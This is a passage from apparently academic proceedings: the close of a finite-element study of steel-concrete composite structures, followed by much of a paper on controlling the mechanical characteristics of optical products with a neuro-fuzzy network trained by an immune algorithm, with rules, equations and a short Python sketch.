which may have different densities depending on the research task and the structural element. To model two-dimensional rod elements of the structures, it is enough to use finite elements that have the same dimensions as the element itself. When modeling structures using three-dimensional solid models, the solid finite elements, as in the previous case, can have different sizes. Elastic and elastically nonlinear models of materials are used for the numerical calculations. The elastic model is given by introducing the modulus of elasticity and Poisson's ratio. The elastically nonlinear model additionally requires the introduction of Prandtl diagrams. The stress-strain state of combined steel and concrete structures is investigated. Modeling of their work under loads applied in different ways has shown the joint work of the components of the module. The obtained results indicate that combined steel and concrete structures under load behave as integral elements. Consequently, in the study of the stress-strain state of combined steel and concrete structures under a uniform load (similar to the experiment), data are obtained that agree with the experimental and theoretical data to within 9%. As a result of the research on the design under loading, it is established that its bearing capacity and deformation scheme depend on the place of application of the external loading and its size. As a result of the study, an algorithm for conducting a numerical experiment is obtained, which includes successive actions: depending on the task, an elastic or elastic-plastic model of the material is taken; if the elastic model of the material is accepted, then for modeling it is enough to enter the elastic modulus and Poisson's ratio, and if the elastic-plastic model of the material is accepted, then it is necessary to additionally set the Prandtl diagram; then the boundary conditions are set; following the obtained recommendations or being guided by [11, 14, 17], the size of the finite element should be accepted; the next step is building a calculation model by meshing the geometric model of the structure into a finite element mesh; the last steps are the calculations and data analysis.
References

1. Aznakayeva, D.E., Yakovenko, I.A., Aznakayev, E.G.: Numerical calculation of passive acoustic graphene nanosensor parameters. In: The 2016 IEEE Radar Methods and Systems Workshop (RMSW), pp. 95–98. IEEE (2016)
2. Bui, V.T., Truong, V.H., Trinh, M.C., Kim, S.E.: Fully nonlinear analysis of steel-concrete composite girder with web local buckling effects. Int. J. Mech. Sci. 184, 105729 (2020)
3. Francavilla, A.B., Latour, M., Rizzano, G.: Experimental and numerical analyses of steel-concrete composite floors. Open Civ. Eng. J. 14(1), 163–178 (2020)
4. Gasii, G.M.: Finite element analysis of the stress and strain state of the node of the top belt of the steel and concrete composite cable space frame. Collect. Sci. Works Ukrainian State Univ. Railway Transp. 171, 69–76 (2017)
5. Gorodetsky, O.S., Barabash, M.S., Filonenko, Y.B.: Numerical methods for determining stiffness properties of a bar cross-section. Cybern. Syst. Anal. 55(2), 329–335 (2019)
6. Hassan, M.K., Subramanian, K.B., Saha, S., Sheikh, M.N.: The behavior of prefabricated steel-concrete composite slabs with a novel interlocking system – numerical analysis. Eng. Struct. 245, 112905 (2021)
7. Ju, H., Lee, D., Choi, D.U.: Finite element analysis of steel-concrete composite connection with prefabricated permanent steel form. J. Asian Concr. Fed. 8(1), 1–15 (2022)
8. Lapenko, O., Baranetska, D., Makarov, V., Baranetskyi, A.: Designing of structural construction and orthotropic slabs from steel reinforced concrete. In: Materials Science Forum, vol. 1006, pp. 173–178. Trans Tech Publications Ltd. (2020)
9. Lemes, Í.J., Dias, L.E., Silveira, R.A., Silva, A.R., Carvalho, T.A.: Numerical analysis of steel-concrete composite beams with partial interaction: a plastic-hinge approach. Eng. Struct. 248, 113256 (2021)
10. Lima, P.H., Carvalho, T.A., Lemes, Í.J., Barros, R.C., Silveira, R.A.: Non-linear analysis of steel-concrete composite frames via RPHM considering cracking and partial shear connection. In: Proceedings of the XLI Ibero-Latin-American Congress on Computational Methods in Engineering, ABMEC, pp. 1–7 (2020)
11. Perelmuter, A.V.: Calculation Models of Structures and the Possibility of their Analysis. SCAD Soft (2011)
12. Perelmuter, A.V.: Structural Mechanics Conversations. SCAD Soft, ASV (2014)
13. Rossi, A., Nicoletti, R.S., de Souza, A.S.C., Martins, C.H.: Numerical assessment of lateral distortional buckling in steel-concrete composite beams. J. Constr. Steel Res. 172, 106192 (2020)
14. Rudakov, K.N.: FEMAP 10.2.0 Geometric and Finite Element Modeling of Structures. KPI (2011)
15. Sathyamoorthy, M.: Nonlinear Analysis of Structures. CRC Press, Boca Raton (2017)
16. Storozhenko, L.I., Gasii, G.M.: Experimental research of strain-stress state of ferrocement slabs of composite reinforced concrete structure elements. Metall. Min. Ind. 6(6), 40–42 (2014)
17. Storozhenko, L., Gasii, G.: Analysis of stress-strain state of the steel-concrete composite ribbed slab as a part of the spatial grid-cable suspended structure. Ind. Mach. Build. Civ. Eng. 2, 81–86 (2016)
18. Storozhenko, L., Gasii, G., Hohol, M., Hasii, O.: Preparation technique of experimental specimens of steel and concrete composite slabs. In: Onyshchenko, V., Mammadova, G., Sivitska, S., Gasimov, A. (eds.) ICBI 2020. LNCE, vol. 181, pp. 147–154. Springer, Cham (2020). https://doi.org/10.1007/978-3-030-85043-2_14
19. Uddin, M.A., Sheikh, A.H., Brown, D., Bennett, T., Uy, B.: Geometrically nonlinear inelastic analysis of steel-concrete composite beams with partial interaction using a higher-order beam theory. Int. J. Non-Linear Mech. 100, 34–47 (2018)
20. Wang, Y.H., Yu, J., Liu, J., Chen, Y.F.: Experimental and numerical analysis of steel-block shear connectors in assembled monolithic steel-concrete composite beams. J. Bridge Eng. 24(5), 04019024 (2019)
Intellectual Control of Mechanical Characteristics of Optical Products

Iryna Makarenko, Eugene Fedorov, Yuliia Bondarenko(B), and Yevhenii Bondarenko

Cherkasy State Technological University, Cherkasy, Ukraine
[email protected], [email protected]
Abstract. The priority tasks within the framework of this paper are the development of the process of intellectual control of the mechanical characteristics of optical products, its automation, as well as reducing computational complexity and increasing accuracy and reliability. The aim of the research is to increase the efficiency of control of the mechanical characteristics of optical products by using an artificial neuro-fuzzy network trained on the basis of an immune algorithm. An artificial neural network for automating the intellectual control of the mechanical characteristics of optical products is developed and investigated in the work. It provides representation of the knowledge used for control of the characteristics of optical products as rules clear to human logic; it reduces the RMS error by 2.8–3.1 times and the probability of making a wrong decision by 7–11 times, and reduces the overall computational complexity of control by automatically selecting the model structure of the artificial neuro-fuzzy network, reducing the probability of hitting a local extremum, and using parallel information processing technology for the immune algorithm and backpropagation in batch mode. The possibility of using the process of intellectual control of the mechanical characteristics of optical products in various information and measuring systems is considered. Keywords: optical product · efficiency criteria · neural network · fuzzy inference system · immune algorithm
1 Introduction

The use of optical products in various spheres of human activity (household, military, telecommunications, medical, etc.) has recently become increasingly common. The development of renewable energy and resource-saving technologies for the manufacture of modern optical devices and systems is gaining popularity within the concept of sustainable development and the "Industry 4.0" initiative [1]. The most common material used today in the manufacture of most components of optical devices is optical silicate glass. The popularity of this material is due to the significant development of technologies for its production and processing, which make it possible to obtain high accuracy and cleanliness of working surfaces while maintaining their properties and characteristics for a long time under the influence of external factors. In addition, the components of optical devices can control the parameters of the optical
medium or light wave when interacting with electromagnetic fields of the light, infrared, ultraviolet and other ranges (changing light transmission, generating coherent radiation, etc.) [2]. At the same time, the issue of highly effective control of the mechanical characteristics of optical products (modulus of elasticity, toughness, strength, high compressive strength, low tensile and flexural strength, etc.) is acute due to the specifics of the use of such products in the environment (often aggressive and extreme), especially in critical applications (energy, space, military, medical and others). It is known [3] that various methods are used to measure the mechanical characteristics of optical products, which, in turn, are divided into static, dynamic and analytical ones. However, the current information and measurement systems (IMS) for the mechanical characteristics of optical products, based on these methods, have a certain disadvantage, namely insufficient efficiency in making decisions to meet consumer requirements for different tasks [4]. The effectiveness of the control of the mechanical characteristics of optical products by traditional methods and means is significantly influenced by stochastic environmental factors, for which there are no unambiguous laws that can be described by the methods of classical logic and set theory. At the same time, the significant complexity, required speed, and large number of control cycles call for modern approaches involving neural network technologies. Currently, artificial intelligence methods are used to control the characteristics of optical products, the most popular being artificial neural networks, whose advantages are the following [5–7]:

• the possibility of their training and adaptation;
• the ability to identify patterns in the data and generalize them, i.e., to extract knowledge from data, which does not require prior knowledge of the object (for example, its mathematical model);
• parallel processing of information, which increases their computing power.

At the same time [8–10], the following shortcomings of neural networks should be noted:

• difficulties in determining the structure of the network, as there are no algorithms for calculating the number of layers and neurons in each layer for specific applications;
• the problem of forming a representative sample;
• a high probability that the learning and adaptation method falls into a local extremum;
• the accumulated knowledge of the network is inaccessible to human understanding (the relationship between input and output data cannot be represented in the form of rules), because it is distributed among all elements of the neural network and is encoded in its weights.

Recently, neural networks have been combined with fuzzy inference systems, which, according to A. Rotshtein, S. Shtovba, and I. Mostav [11, 12], makes it possible to present knowledge as rules that are easily accessible to human understanding, with no need for accurate estimation of variable objects (incompleteness and inaccuracy of data). However, S. Abe, L.H. Tsoukalas, and R.E. Uhrig [13, 14] have noted the shortcomings of fuzzy inference systems, namely: the impossibility of their learning and adaptation
(there is no possibility of automatic adjustment of the parameters of the membership functions) and the impossibility of parallel processing of information, which would increase the computing power. At the same time, E.E. Fedorov, T.Yu. Utkina, D.A. Harder, W.M. Lukashenko, and Z.J. Czech have shown [15–17] that metaheuristics and, in particular, immune algorithms can be used instead of neural network learning algorithms; their main advantage is that, when training neural networks, the probability of the latter falling into a local extremum is reduced. However, according to the results of [18, 19], it should be borne in mind that the disadvantage of immune algorithms for learning neural networks is that the speed and accuracy of the solution search are lower than those of other methods of learning neural networks. In connection with the above, in the authors' opinion, the use of an artificial neuro-fuzzy network trained using an immune algorithm is promising and relevant in the process of controlling the mechanical characteristics of optical products [5].

The purpose of the study: to increase the control effectiveness indicators (accuracy, reliability and speed) for the mechanical characteristics of optical products (modulus of elasticity, impact strength, resistance to external loads, strength limit) through the use of an artificial neuro-fuzzy network trained on the basis of an immune algorithm. To achieve this goal, it is necessary to solve the following tasks:

1. To create a system of fuzzy control of the mechanical characteristics of optical products.
2. To create a mathematical model of an artificial neuro-fuzzy network for control of the mechanical characteristics of optical products.
3. To choose criteria for estimating the efficiency of the mathematical model of the artificial neuro-fuzzy network for control of the mechanical characteristics of optical products.
4. To identify the parameters of the mathematical model of the artificial neuro-fuzzy network for controlling the mechanical characteristics of optical products based on the backpropagation algorithm in batch mode.
5. To identify the parameters of the mathematical model of the artificial neuro-fuzzy network for controlling the mechanical characteristics of optical products based on the immune algorithm.
2 Materials and Methods

2.1 Creation of a Fuzzy Control System of Mechanical Characteristics of Optical Products

Creating a system of fuzzy control of mechanical characteristics of optical products involves the following stages [5]:

• formation of linguistic variables;
• formation of a base of fuzzy rules;
• fuzzyfication;
• aggregation of conditions;
• activation of conclusions;
• aggregation of outputs;
• defuzzyfication.

2.1.1 Formation of Linguistic Variables

The following crisp input variables have been chosen: modulus of elasticity ($x_1$); impact strength ($x_2$); load resistance ($x_3$); strength limit ($x_4$).

The following linguistic input variables have been chosen: the value of the modulus of elasticity $\tilde{x}_1$ with values $\tilde{\alpha}_{11}$ = large and $\tilde{\alpha}_{12}$ = small, whose domains of values are the fuzzy sets $\tilde{A}_{11} = \{x_1 \mid \mu_{\tilde{A}_{11}}(x_1)\}$ and $\tilde{A}_{12} = \{x_1 \mid 1 - \mu_{\tilde{A}_{11}}(x_1)\}$; the magnitude of the impact strength $\tilde{x}_2$ with values $\tilde{\alpha}_{21}$ = large and $\tilde{\alpha}_{22}$ = small, whose domains of values are the fuzzy sets $\tilde{A}_{21} = \{x_2 \mid \mu_{\tilde{A}_{21}}(x_2)\}$ and $\tilde{A}_{22} = \{x_2 \mid 1 - \mu_{\tilde{A}_{21}}(x_2)\}$; the value of load resistance $\tilde{x}_3$ with values $\tilde{\alpha}_{31}$ = strong and $\tilde{\alpha}_{32}$ = weak, whose domains of values are the fuzzy sets $\tilde{A}_{31} = \{x_3 \mid \mu_{\tilde{A}_{31}}(x_3)\}$ and $\tilde{A}_{32} = \{x_3 \mid 1 - \mu_{\tilde{A}_{31}}(x_3)\}$; the value of the strength limit $\tilde{x}_4$ with values $\tilde{\alpha}_{41}$ = high and $\tilde{\alpha}_{42}$ = low, whose domains of values are the fuzzy sets $\tilde{A}_{41} = \{x_4 \mid \mu_{\tilde{A}_{41}}(x_4)\}$ and $\tilde{A}_{42} = \{x_4 \mid 1 - \mu_{\tilde{A}_{41}}(x_4)\}$.

The number of the action type that changes the mechanical characteristics of optical products, $y$, has been chosen as the crisp output variable. The linguistic output variable is the action $\tilde{y}$ that changes the value of the mechanical characteristics of optical products, with values $\tilde{\beta}_1$ = increase, $\tilde{\beta}_2$ = decrease and $\tilde{\beta}_3$ = do not change, whose domains of values are the fuzzy sets $\tilde{B}_1 = \{y \mid \mu_{\tilde{B}_1}(y)\}$, $\tilde{B}_2 = \{y \mid \mu_{\tilde{B}_2}(y)\}$ and $\tilde{B}_3 = \{y \mid \mu_{\tilde{B}_3}(y)\}$.

2.1.2 Formation of a Base of Fuzzy Rules

The following fuzzy rules have been chosen:

1. $R_1$: if $\tilde{x}_1$ is $\tilde{\alpha}_{11}$ and $\tilde{x}_2$ is $\tilde{\alpha}_{21}$ and $\tilde{x}_3$ is $\tilde{\alpha}_{31}$ and $\tilde{x}_4$ is $\tilde{\alpha}_{41}$, then $\tilde{y}$ is $\tilde{\beta}_1$ ($F_1$)
2. $R_2$: if $\tilde{x}_1$ is $\tilde{\alpha}_{12}$ and $\tilde{x}_2$ is $\tilde{\alpha}_{22}$ and $\tilde{x}_3$ is $\tilde{\alpha}_{32}$ and $\tilde{x}_4$ is $\tilde{\alpha}_{42}$, then $\tilde{y}$ is $\tilde{\beta}_2$ ($F_2$)
3. $R_3$: if $\tilde{x}_1$ is $\tilde{\alpha}_{11}$ and $\tilde{x}_2$ is $\tilde{\alpha}_{22}$ and $\tilde{x}_3$ is $\tilde{\alpha}_{32}$ and $\tilde{x}_4$ is $\tilde{\alpha}_{42}$, then $\tilde{y}$ is $\tilde{\beta}_2$ ($F_3$)
4. $R_4$: if $\tilde{x}_1$ is $\tilde{\alpha}_{11}$ and $\tilde{x}_2$ is $\tilde{\alpha}_{21}$ and $\tilde{x}_3$ is $\tilde{\alpha}_{32}$ and $\tilde{x}_4$ is $\tilde{\alpha}_{42}$, then $\tilde{y}$ is $\tilde{\beta}_3$ ($F_4$)
5. $R_5$: if $\tilde{x}_1$ is $\tilde{\alpha}_{11}$ and $\tilde{x}_2$ is $\tilde{\alpha}_{22}$ and $\tilde{x}_3$ is $\tilde{\alpha}_{31}$ and $\tilde{x}_4$ is $\tilde{\alpha}_{42}$, then $\tilde{y}$ is $\tilde{\beta}_3$ ($F_5$)
6. $R_6$: if $\tilde{x}_1$ is $\tilde{\alpha}_{11}$ and $\tilde{x}_2$ is $\tilde{\alpha}_{22}$ and $\tilde{x}_3$ is $\tilde{\alpha}_{32}$ and $\tilde{x}_4$ is $\tilde{\alpha}_{41}$, then $\tilde{y}$ is $\tilde{\beta}_3$ ($F_6$)
7. $R_7$: if $\tilde{x}_1$ is $\tilde{\alpha}_{11}$ and $\tilde{x}_2$ is $\tilde{\alpha}_{22}$ and $\tilde{x}_3$ is $\tilde{\alpha}_{31}$ and $\tilde{x}_4$ is $\tilde{\alpha}_{41}$, then $\tilde{y}$ is $\tilde{\beta}_1$ ($F_7$)
8. $R_8$: if $\tilde{x}_1$ is $\tilde{\alpha}_{12}$ and $\tilde{x}_2$ is $\tilde{\alpha}_{21}$ and $\tilde{x}_3$ is $\tilde{\alpha}_{32}$ and $\tilde{x}_4$ is $\tilde{\alpha}_{42}$, then $\tilde{y}$ is $\tilde{\beta}_2$ ($F_8$)
9. $R_9$: if $\tilde{x}_1$ is $\tilde{\alpha}_{12}$ and $\tilde{x}_2$ is $\tilde{\alpha}_{21}$ and $\tilde{x}_3$ is $\tilde{\alpha}_{31}$ and $\tilde{x}_4$ is $\tilde{\alpha}_{42}$, then $\tilde{y}$ is $\tilde{\beta}_3$ ($F_9$)
10. $R_{10}$: if $\tilde{x}_1$ is $\tilde{\alpha}_{12}$ and $\tilde{x}_2$ is $\tilde{\alpha}_{21}$ and $\tilde{x}_3$ is $\tilde{\alpha}_{32}$ and $\tilde{x}_4$ is $\tilde{\alpha}_{41}$, then $\tilde{y}$ is $\tilde{\beta}_1$ ($F_{10}$)
11. $R_{11}$: if $\tilde{x}_1$ is $\tilde{\alpha}_{11}$ and $\tilde{x}_2$ is $\tilde{\alpha}_{21}$ and $\tilde{x}_3$ is $\tilde{\alpha}_{32}$ and $\tilde{x}_4$ is $\tilde{\alpha}_{41}$, then $\tilde{y}$ is $\tilde{\beta}_1$ ($F_{11}$)
12. $R_{12}$: if $\tilde{x}_1$ is $\tilde{\alpha}_{12}$ and $\tilde{x}_2$ is $\tilde{\alpha}_{22}$ and $\tilde{x}_3$ is $\tilde{\alpha}_{31}$ and $\tilde{x}_4$ is $\tilde{\alpha}_{42}$, then $\tilde{y}$ is $\tilde{\beta}_3$ ($F_{12}$)
13. $R_{13}$: if $\tilde x_1$ is $\tilde\alpha_{12}$ and $\tilde x_2$ is $\tilde\alpha_{22}$ and $\tilde x_3$ is $\tilde\alpha_{31}$ and $\tilde x_4$ is $\tilde\alpha_{41}$, then $\tilde\gamma$ is $\tilde\beta_1$ ($F_{13}$)
14. $R_{14}$: if $\tilde x_1$ is $\tilde\alpha_{12}$ and $\tilde x_2$ is $\tilde\alpha_{21}$ and $\tilde x_3$ is $\tilde\alpha_{31}$ and $\tilde x_4$ is $\tilde\alpha_{41}$, then $\tilde\gamma$ is $\tilde\beta_1$ ($F_{14}$)
15. $R_{15}$: if $\tilde x_1$ is $\tilde\alpha_{12}$ and $\tilde x_2$ is $\tilde\alpha_{22}$ and $\tilde x_3$ is $\tilde\alpha_{32}$ and $\tilde x_4$ is $\tilde\alpha_{41}$, then $\tilde\gamma$ is $\tilde\beta_3$ ($F_{15}$)
16. $R_{16}$: if $\tilde x_1$ is $\tilde\alpha_{11}$ and $\tilde x_2$ is $\tilde\alpha_{21}$ and $\tilde x_3$ is $\tilde\alpha_{31}$ and $\tilde x_4$ is $\tilde\alpha_{42}$, then $\tilde\gamma$ is $\tilde\beta_3$ ($F_{16}$)

where $F_r$ are the coefficients of the fuzzy rules $R_r$.

The formed base of fuzzy rules makes it possible to describe all possible values of the action $\tilde\gamma$ that changes the value of the mechanical characteristics of optical products from the values of the input variables of these characteristics.
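Before formalizing fuzzification, it may help to see the rule base as data. The following is an illustrative sketch in Python (not the authors' implementation): each entry stores the antecedent term numbers and the consequent class, exactly as in rules 1–16 above.

```python
# Rule base of Sect. 2.1.2 as data: antecedent term numbers (j = 1 is the
# first term "large/strong/high", j = 2 its complement) and the consequent
# class k (1 = increase, 2 = decrease, 3 = do not change).
RULES = [
    ((1, 1, 1, 1), 1), ((2, 2, 2, 2), 2), ((1, 2, 2, 2), 2), ((1, 1, 2, 2), 3),
    ((1, 2, 1, 2), 3), ((1, 2, 2, 1), 3), ((1, 2, 1, 1), 1), ((2, 1, 2, 2), 2),
    ((2, 1, 1, 2), 3), ((2, 1, 2, 1), 1), ((1, 1, 2, 1), 1), ((2, 2, 1, 2), 3),
    ((2, 2, 1, 1), 1), ((2, 1, 1, 1), 1), ((2, 2, 2, 1), 3), ((1, 1, 1, 2), 3),
]
```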
2.1.3 Fuzzification

The degree of truth of each condition of each rule is determined using the membership function $\mu_{\tilde A_{ij}}(x_i)$. The Gaussian function has been chosen as the condition membership function (its advantages are the ability to specify the region where the function takes the value 1, as well as the ability to specify a gradual change of the function to the left and right of the fuzzy set kernel):

$$\mu_{\tilde A_{i1}}(x_i) = \exp\left(-\frac{1}{2}\left(\frac{x_i - m_{i1}}{\sigma_{i1}}\right)^2\right), \quad i \in \overline{1,4}, \qquad (1)$$

$$\mu_{\tilde A_{i2}}(x_i) = 1 - \mu_{\tilde A_{i1}}(x_i), \quad i \in \overline{1,4},$$

where $m_{ij}$ is the mathematical expectation and $\sigma_{ij}$ is the standard deviation.

2.1.4 Aggregation of Conditions

The membership function of the condition of each rule is defined as:

1. $\mu_{\tilde A_1}(x) = \min\{\mu_{\tilde A_{11}}(x_1), \mu_{\tilde A_{21}}(x_2), \mu_{\tilde A_{31}}(x_3), \mu_{\tilde A_{41}}(x_4)\}$
2. $\mu_{\tilde A_2}(x) = \min\{\mu_{\tilde A_{12}}(x_1), \mu_{\tilde A_{22}}(x_2), \mu_{\tilde A_{32}}(x_3), \mu_{\tilde A_{42}}(x_4)\}$
3. $\mu_{\tilde A_3}(x) = \min\{\mu_{\tilde A_{11}}(x_1), \mu_{\tilde A_{22}}(x_2), \mu_{\tilde A_{32}}(x_3), \mu_{\tilde A_{42}}(x_4)\}$
4. $\mu_{\tilde A_4}(x) = \min\{\mu_{\tilde A_{11}}(x_1), \mu_{\tilde A_{21}}(x_2), \mu_{\tilde A_{32}}(x_3), \mu_{\tilde A_{42}}(x_4)\}$
5. $\mu_{\tilde A_5}(x) = \min\{\mu_{\tilde A_{11}}(x_1), \mu_{\tilde A_{22}}(x_2), \mu_{\tilde A_{31}}(x_3), \mu_{\tilde A_{42}}(x_4)\}$
6. $\mu_{\tilde A_6}(x) = \min\{\mu_{\tilde A_{11}}(x_1), \mu_{\tilde A_{22}}(x_2), \mu_{\tilde A_{32}}(x_3), \mu_{\tilde A_{41}}(x_4)\}$
7. $\mu_{\tilde A_7}(x) = \min\{\mu_{\tilde A_{11}}(x_1), \mu_{\tilde A_{22}}(x_2), \mu_{\tilde A_{31}}(x_3), \mu_{\tilde A_{41}}(x_4)\}$
8. $\mu_{\tilde A_8}(x) = \min\{\mu_{\tilde A_{12}}(x_1), \mu_{\tilde A_{21}}(x_2), \mu_{\tilde A_{32}}(x_3), \mu_{\tilde A_{42}}(x_4)\}$
9. $\mu_{\tilde A_9}(x) = \min\{\mu_{\tilde A_{12}}(x_1), \mu_{\tilde A_{21}}(x_2), \mu_{\tilde A_{31}}(x_3), \mu_{\tilde A_{42}}(x_4)\}$
10. $\mu_{\tilde A_{10}}(x) = \min\{\mu_{\tilde A_{12}}(x_1), \mu_{\tilde A_{21}}(x_2), \mu_{\tilde A_{32}}(x_3), \mu_{\tilde A_{41}}(x_4)\}$
11. $\mu_{\tilde A_{11}}(x) = \min\{\mu_{\tilde A_{11}}(x_1), \mu_{\tilde A_{21}}(x_2), \mu_{\tilde A_{32}}(x_3), \mu_{\tilde A_{41}}(x_4)\}$
12. $\mu_{\tilde A_{12}}(x) = \min\{\mu_{\tilde A_{12}}(x_1), \mu_{\tilde A_{22}}(x_2), \mu_{\tilde A_{31}}(x_3), \mu_{\tilde A_{42}}(x_4)\}$
13. $\mu_{\tilde A_{13}}(x) = \min\{\mu_{\tilde A_{12}}(x_1), \mu_{\tilde A_{22}}(x_2), \mu_{\tilde A_{31}}(x_3), \mu_{\tilde A_{41}}(x_4)\}$
14. $\mu_{\tilde A_{14}}(x) = \min\{\mu_{\tilde A_{12}}(x_1), \mu_{\tilde A_{21}}(x_2), \mu_{\tilde A_{31}}(x_3), \mu_{\tilde A_{41}}(x_4)\}$
15. $\mu_{\tilde A_{15}}(x) = \min\{\mu_{\tilde A_{12}}(x_1), \mu_{\tilde A_{22}}(x_2), \mu_{\tilde A_{32}}(x_3), \mu_{\tilde A_{41}}(x_4)\}$
16. $\mu_{\tilde A_{16}}(x) = \min\{\mu_{\tilde A_{11}}(x_1), \mu_{\tilde A_{21}}(x_2), \mu_{\tilde A_{31}}(x_3), \mu_{\tilde A_{42}}(x_4)\}$ $\qquad (2)$

As can be seen from the above, the membership function of the condition of each rule is formed by taking the minimum of the membership functions of the relevant input variables, which guarantees compliance with the main condition of the task: increasing the effectiveness of controlling the mechanical characteristics of optical products by reducing the discrepancy between experimentally obtained values and the results of fuzzy modeling.

2.1.5 Activation of Outputs

The membership function of each rule's output is defined as follows:

1. $\mu_{\tilde C_1}(x, z) = \min\{\mu_{\tilde A_1}(x), \mu_{\tilde B_1}(z)\}\, F_1$
2. $\mu_{\tilde C_2}(x, z) = \min\{\mu_{\tilde A_2}(x), \mu_{\tilde B_2}(z)\}\, F_2$
3. $\mu_{\tilde C_3}(x, z) = \min\{\mu_{\tilde A_3}(x), \mu_{\tilde B_2}(z)\}\, F_3$
4. $\mu_{\tilde C_4}(x, z) = \min\{\mu_{\tilde A_4}(x), \mu_{\tilde B_3}(z)\}\, F_4$
5. $\mu_{\tilde C_5}(x, z) = \min\{\mu_{\tilde A_5}(x), \mu_{\tilde B_3}(z)\}\, F_5$
6. $\mu_{\tilde C_6}(x, z) = \min\{\mu_{\tilde A_6}(x), \mu_{\tilde B_3}(z)\}\, F_6$
7. $\mu_{\tilde C_7}(x, z) = \min\{\mu_{\tilde A_7}(x), \mu_{\tilde B_1}(z)\}\, F_7$
8. $\mu_{\tilde C_8}(x, z) = \min\{\mu_{\tilde A_8}(x), \mu_{\tilde B_2}(z)\}\, F_8$
9. $\mu_{\tilde C_9}(x, z) = \min\{\mu_{\tilde A_9}(x), \mu_{\tilde B_3}(z)\}\, F_9$
10. $\mu_{\tilde C_{10}}(x, z) = \min\{\mu_{\tilde A_{10}}(x), \mu_{\tilde B_1}(z)\}\, F_{10}$
11. $\mu_{\tilde C_{11}}(x, z) = \min\{\mu_{\tilde A_{11}}(x), \mu_{\tilde B_1}(z)\}\, F_{11}$
12. $\mu_{\tilde C_{12}}(x, z) = \min\{\mu_{\tilde A_{12}}(x), \mu_{\tilde B_3}(z)\}\, F_{12}$
13. $\mu_{\tilde C_{13}}(x, z) = \min\{\mu_{\tilde A_{13}}(x), \mu_{\tilde B_1}(z)\}\, F_{13}$
14. $\mu_{\tilde C_{14}}(x, z) = \min\{\mu_{\tilde A_{14}}(x), \mu_{\tilde B_1}(z)\}\, F_{14}$
15. $\mu_{\tilde C_{15}}(x, z) = \min\{\mu_{\tilde A_{15}}(x), \mu_{\tilde B_3}(z)\}\, F_{15}$
16. $\mu_{\tilde C_{16}}(x, z) = \min\{\mu_{\tilde A_{16}}(x), \mu_{\tilde B_3}(z)\}\, F_{16}$

In this paper, the membership functions $\mu_{\tilde B_k}(z)$ and the weights of the fuzzy rules $F_r$ are defined as

$$\mu_{\tilde B_k}(z) = [z = k] = \begin{cases} 1, & z = k, \\ 0, & z \ne k, \end{cases} \quad k \in \overline{1,3}, \qquad F_1 = \ldots = F_{16} = 1. \qquad (3)$$
2.1.6 Aggregation of Outputs

The membership function of the final output is determined as follows:

$$\mu_{\tilde C}(x, z) = \max\{\mu_{\tilde C_1}(x, z), \ldots, \mu_{\tilde C_{16}}(x, z)\}, \quad z \in \overline{1,3}. \qquad (4)$$
The resulting membership function of the final output is obtained by maximizing the output membership functions of the individual rules, which makes it possible to obtain the maximum increase in the efficiency of control of the mechanical characteristics of optical products.
2.1.7 Defuzzification

To obtain the number of the type of action that changes the value of the mechanical characteristics of optical products, the maximum-membership method is used:

$$z^* = \arg\max_{z} \mu_{\tilde C}(x, z), \quad z \in \overline{1,3}. \qquad (5)$$
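A minimal Python sketch of the complete inference chain (1)–(5) follows, reusing the RULES table above. It is an illustration only: the parameter vectors m and s stand in for the identified mathematical expectations $m_{i1}$ and standard deviations $\sigma_{i1}$, and all rule weights are taken as $F_r = 1$ per Eq. (3).

```python
import math

def gauss_mf(x, m, s):
    """Gaussian membership function of the first term, Eq. (1)."""
    return math.exp(-0.5 * ((x - m) / s) ** 2)

def infer(x, m, s, rules):
    """Fuzzification, aggregation, activation, output aggregation and
    defuzzification, Eqs. (1)-(5); all rule weights F_r = 1.
    x, m, s are 4-element sequences; rules is the RULES table above."""
    mu = []
    for xi, mi, si in zip(x, m, s):
        g = gauss_mf(xi, mi, si)
        mu.append((g, 1.0 - g))          # terms j = 1 and j = 2
    y = {1: 0.0, 2: 0.0, 3: 0.0}         # output membership per class z
    for terms, k in rules:
        fire = min(mu[i][j - 1] for i, j in enumerate(terms))  # Eq. (2)
        y[k] = max(y[k], fire)           # Eqs. (3)-(4)
    return max(y, key=y.get)             # Eq. (5): maximum membership
```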
Applying the maximum-membership method (5) yields the number of the type of action that most strongly changes the mechanical characteristics of optical products.

2.2 Creation of a Mathematical Model of an Artificial Fuzzy Control Network of Mechanical Characteristics of Optical Products

On the basis of the system of fuzzy control of the mechanical characteristics of optical products, a mathematical model of an artificial fuzzy network is proposed, the structure of which is presented in the form of a graph in Fig. 1.
Fig. 1. The structure of the model of an artificial fuzzy network in the form of a graph
The input (zero) layer contains four neurons (corresponding to the number of input variables). The first hidden layer implements fuzzification and contains eight neurons (corresponding to the number of values of the linguistic input variables). The second hidden layer implements the aggregation of conditions and contains sixteen neurons (corresponding to the number of fuzzy rules). The third hidden layer implements the activation of outputs and contains sixteen neurons (corresponding to the number of fuzzy rules). The output (fourth) layer implements the aggregation of outputs and contains three neurons (corresponding to the number of values of the linguistic output variable).

The operation of the artificial fuzzy network is presented as follows. The first layer calculates the membership functions of the conditions:

$$\mu_{\tilde A_{i1}}(x_i) = \exp\left(-\frac{1}{2}\left(\frac{x_i - m_{i1}}{\sigma_{i1}}\right)^2\right), \quad i \in \overline{1,4}, \qquad (6)$$
$$\mu_{\tilde A_{i2}}(x_i) = 1 - \mu_{\tilde A_{i1}}(x_i), \quad i \in \overline{1,4}. \qquad (7)$$
The second layer calculates the membership functions of the conditions based on min–max neurons:

$$\mu_{\tilde A_r}(x) = \min_{i} \max_{j} \left\{ w_{ij}^{r}\, \mu_{\tilde A_{ij}}(x_i) \right\}, \quad i \in \overline{1,4},\ j \in \overline{1,2},\ r \in \overline{1,16}, \qquad (8)$$

with the binary weights

$w_{11}^{1}=1,\ w_{12}^{1}=0,\ w_{21}^{1}=1,\ w_{22}^{1}=0,\ w_{31}^{1}=1,\ w_{32}^{1}=0,\ w_{41}^{1}=1,\ w_{42}^{1}=0$
$w_{11}^{2}=0,\ w_{12}^{2}=1,\ w_{21}^{2}=0,\ w_{22}^{2}=1,\ w_{31}^{2}=0,\ w_{32}^{2}=1,\ w_{41}^{2}=0,\ w_{42}^{2}=1$
$w_{11}^{3}=1,\ w_{12}^{3}=0,\ w_{21}^{3}=0,\ w_{22}^{3}=1,\ w_{31}^{3}=0,\ w_{32}^{3}=1,\ w_{41}^{3}=0,\ w_{42}^{3}=1$
$w_{11}^{4}=1,\ w_{12}^{4}=0,\ w_{21}^{4}=1,\ w_{22}^{4}=0,\ w_{31}^{4}=0,\ w_{32}^{4}=1,\ w_{41}^{4}=0,\ w_{42}^{4}=1$
